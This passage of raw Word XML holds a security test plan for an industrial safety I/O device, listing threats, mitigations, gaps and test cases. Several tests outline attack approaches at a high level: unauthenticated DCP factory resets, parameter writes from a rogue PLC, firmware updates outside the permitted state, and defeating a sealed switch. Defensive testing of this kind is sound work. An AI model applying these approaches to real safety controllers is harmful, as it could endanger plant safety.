        <w:t xml:space="preserve"> CR 1.1, CR 1.2, CR 2.1 (2), CR 3.4</w:t>
      </w:r>
      <w:r w:rsidR="00946C02" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, EDR </w:t>
      </w:r>
      <w:r w:rsidR="0005457F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1990AD28" w14:textId="4FDF0A57" w:rsidR="00DB1578" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B (Safety Config), G (Operating Mode)</w:t>
      </w:r>
      <w:r w:rsidR="0005457F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, F (Domain Separation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4F8D1A" w14:textId="571F214D" w:rsidR="00DB1578" w:rsidRPr="006D5B99" w:rsidRDefault="00196EB6" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tampering</w:t>
      </w:r>
      <w:r w:rsidR="00451280" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Spoofing, Elevation of Privilege</w:t>
      </w:r>
      <w:r w:rsidR="00451280" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3188B4DE" w14:textId="77777777" w:rsidR="0019326C" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BDFEA3" w14:textId="34B722B5"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IoT-Core read-only, incoming-only</w:t>
      </w:r>
      <w:r w:rsidR="00855543" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> No parameter writes over IoT (SRIO-7908, SRIO-8299).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DE5A68" w14:textId="5C155BF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Parameter writes only via fieldbus/</w:t>
      </w:r>
      <w:r w:rsidR="00756315" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PLC 192.168.0.1 (PORT 1)</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> engineering tool (SRIO-1983).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783EFB2E" w14:textId="3D5EB491"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 xml:space="preserve">F-address/update-mode change needs physical </w:t>
      </w:r>
      <w:r w:rsidR="00756315" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Switch 192.168.0.91</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> + power-cycle (SRIO-10812, SRIO-2013).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233704C8" w14:textId="0D3B0642"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FW update accepted only in Update state (SRIO-11534) the mode gate (</w:t>
      </w:r>
      <w:r w:rsidR="00855543" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> limb of RQ-005).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712E39A8" w14:textId="73371EA0" w:rsidR="00AD4AB2" w:rsidRPr="006D5B99" w:rsidRDefault="00AD4AB2" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Config write blocked after param-end (SRIO-7749).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2495E2" w14:textId="77777777" w:rsidR="002D538B" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415E4540" w14:textId="6D7F8E41"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B73F9FC" w:rsidR="00CD5DFC" w:rsidRPr="006D5B99" w:rsidRDefault="00CD5DFC" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">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w:t>
      </w:r>
      <w:r w:rsidR="00912F37" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> passivation), not silent safety-iPar modification. Confirmed by Test 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E36960" w14:textId="4F1596D5" w:rsidR="003C1BAD" w:rsidRPr="006D5B99" w:rsidRDefault="00CD04C7" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-</w:t>
      </w:r>
      <w:r w:rsidR="0019790D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00FB06A8" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Whether the </w:t>
      </w:r>
      <w:r w:rsidR="00756315" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be moved without visible seal damage</w:t>
      </w:r>
      <w:r w:rsidR="006F2199" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the authorization barrier's silent-defeat question </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20300215" w14:textId="77777777" w:rsidR="00157A42" w:rsidRPr="006D5B99" w:rsidRDefault="00157A42" w:rsidP="00157A42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F73D8B" w14:textId="77777777" w:rsidR="00157A42" w:rsidRPr="006D5B99" w:rsidRDefault="00157A42" w:rsidP="00157A42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080D2589" w14:textId="77777777" w:rsidR="00157A42" w:rsidRPr="006D5B99" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085C89BE" w14:textId="77777777" w:rsidR="00157A42" w:rsidRPr="006D5B99" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA92159" w14:textId="77777777" w:rsidR="00157A42" w:rsidRPr="006D5B99" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62691378" w14:textId="77777777" w:rsidR="00157A42" w:rsidRPr="006D5B99" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D30C31A" w14:textId="77777777" w:rsidR="00157A42" w:rsidRPr="006D5B99" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424EDCA5" w14:textId="77777777" w:rsidR="00157A42" w:rsidRPr="006D5B99" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75CC466A" w14:textId="77777777" w:rsidR="00157A42" w:rsidRPr="006D5B99" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4446333F" w14:textId="77777777" w:rsidR="00157A42" w:rsidRPr="006D5B99" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BD3D70" w14:textId="77777777" w:rsidR="00157A42" w:rsidRPr="006D5B99" w:rsidRDefault="00157A42" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0808BEF5" w14:textId="77777777" w:rsidR="0033231D" w:rsidRPr="006D5B99" w:rsidRDefault="0033231D" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6FDB8D" w14:textId="77777777" w:rsidR="003C1BAD" w:rsidRPr="006D5B99" w:rsidRDefault="003C1BAD" w:rsidP="00DB1578">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69DB0B6E"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7273F36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654D5E2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420FC51"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607C9195"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44FBD06F" w14:textId="78A2876F" w:rsidR="00900880" w:rsidRPr="006D5B99"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IoT-Core write-path is blocked (attempt parameter writes via IoT-Core; expect read-only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3104703D" w14:textId="1A0E7A50" w:rsidR="00084BCB"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Positive verification; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B781D2D" w14:textId="466BCF81" w:rsidR="00900880" w:rsidRPr="006D5B99"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CR 2.1 read-only design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="215711AA" w14:textId="77777777" w:rsidR="004E5BBA"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A03FB93" w14:textId="3530847A" w:rsidR="00900880" w:rsidRPr="006D5B99"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OWASP ISTG-DES-AUTHZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43901DF9" w14:textId="77777777"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p w14:paraId="25D70108" w14:textId="7E66AF66" w:rsidR="001C6987"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6D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45A763A6" w14:textId="29EF6989" w:rsidR="00900880" w:rsidRPr="006D5B99"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DCP factory-reset without authentication from a peer node (Mode 2, then 3/4 if present); observe unauthenticated reset of com-config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41A6BB69" w14:textId="60B0729A" w:rsidR="00900880" w:rsidRPr="006D5B99"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Proves/refutes G-2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34707866" w14:textId="2EE2BF98" w:rsidR="00900880" w:rsidRPr="006D5B99"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MITRE T0836 Modify Parameter; OWASP ISTG-DES-AUTHZ-001; NIST SP 800-115 §5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59C79EF2" w14:textId="3812D740"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SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22E66D26" w14:textId="77777777"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Fieldbus parameter write without device authentication: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07A6D99D" w14:textId="6C0EEDD8" w:rsidR="00AA1156"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from </w:t>
            </w:r>
            <w:r w:rsidR="00AA1156" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>not a</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> legitimate </w:t>
            </w:r>
            <w:r w:rsidR="00756315" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PLC</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, attempt an acyclic write of safety iPars during the param phase; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19A4EE72" w14:textId="7CF61594" w:rsidR="00900880" w:rsidRPr="006D5B99"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any credential is demanded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="675C3A04" w14:textId="26F6FF7A" w:rsidR="00900880" w:rsidRPr="006D5B99"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G-1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="582AAAE8" w14:textId="54A66060" w:rsidR="00900880" w:rsidRPr="006D5B99"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MITRE T0843/T0836; NIST SP 800-115 §5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77EB5EFE" w14:textId="5A894C71" w:rsidR="00900880" w:rsidRPr="006D5B99"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900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CF5810A" w14:textId="7B8CD125" w:rsidR="00900880" w:rsidRPr="006D5B99"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Firmware-update access gate (from RQ-005): attempt update outside Update state; confirm rejection; then in Update state confirm acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41640C5D" w14:textId="4B2FFBAE" w:rsidR="00900880" w:rsidRPr="006D5B99"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Validates the authorization gate (EDR 3.10),  bounds G-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78AF7827" w14:textId="77777777" w:rsidR="00AC70A9"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OWASP ISTG-FW[UPDT]-AUTHZ-001; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="363B1A50" w14:textId="0AD7178F" w:rsidR="00900880" w:rsidRPr="006D5B99"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§5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="146D3054" w14:textId="46E339B6" w:rsidR="00900880" w:rsidRPr="006D5B99"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0880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FE77C04" w14:textId="77777777" w:rsidR="0019790D"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Physical-barrier silent defeat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DE25D9B" w14:textId="139D2D81" w:rsidR="00900880" w:rsidRPr="006D5B99"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REUSE TC-RQ003-03 / TC-RQ002-05 by reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="002DD343" w14:textId="52317642" w:rsidR="00900880" w:rsidRPr="006D5B99"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w:t>
            </w:r>
            <w:r w:rsidR="0019790D" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A4B896C" w14:textId="77777777" w:rsidR="002539A8"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OWASP ISTG-PHY; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790E5D8B" w14:textId="1C080243" w:rsidR="00900880" w:rsidRPr="006D5B99"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EDR 3.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3727A425" w14:textId="471D215A" w:rsidR="00900880" w:rsidRPr="006D5B99"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bl>
    <w:p w14:paraId="13525B3F" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DF8378" w14:textId="77777777" w:rsidR="00F8414D" w:rsidRPr="006D5B99" w:rsidRDefault="00F8414D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019E9C66" w14:textId="77777777" w:rsidR="00F8414D" w:rsidRPr="006D5B99" w:rsidRDefault="00F8414D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F25F28B" w14:textId="77777777" w:rsidR="00F8414D" w:rsidRPr="006D5B99" w:rsidRDefault="00F8414D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BAF0D6E" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 - Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E19ED45" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D61D11" w14:textId="0EDEBC2D" w:rsidR="00CF00AD" w:rsidRPr="006D5B99" w:rsidRDefault="00CF00AD" w:rsidP="00CF00AD">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D04992">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ011-01 - </w:t>
      </w:r>
      <w:r w:rsidR="00756A55" w:rsidRPr="00D04992">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Read-Only Enforcement on the Non-Safety Interface</w:t>
